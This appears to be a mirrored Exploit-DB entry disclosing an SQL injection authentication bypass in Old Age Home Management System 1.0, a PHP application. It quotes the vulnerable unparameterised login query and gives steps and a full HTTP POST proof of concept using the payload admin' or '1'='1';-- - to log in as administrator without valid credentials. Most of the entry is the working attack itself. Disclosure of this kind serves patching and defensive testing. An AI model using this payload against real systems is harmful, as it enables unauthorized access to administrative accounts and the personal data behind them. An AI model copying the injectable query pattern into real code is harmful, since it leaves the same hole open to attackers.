Old Age Home Management System 1.0 – SQLi Authentication Bypass

• Exploit Database
• 13 阅读

• 作者： twseptian
  日期： 2022-06-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50966/

• # Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass
  # Date: 12/06/2022
  # Exploit Author: twseptian
  # Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/
  # Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip
  # Version: v1.0
  # Tested on: Kali Linux
  
  # Vulnerable code
  line 9 in file "/oahms/admin/login.php"
  $ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");
  
  # Steps of reproduce:
  1. Go to the admin login page http://localhost/oahms/admin/login.php
  2. sqli payload:admin' or '1'='1';-- -
  3. password: password
  
  # Proof of Concept
  
  POST /oahms/admin/login.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 71
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/oahms/admin/login.php
  Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  
  username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=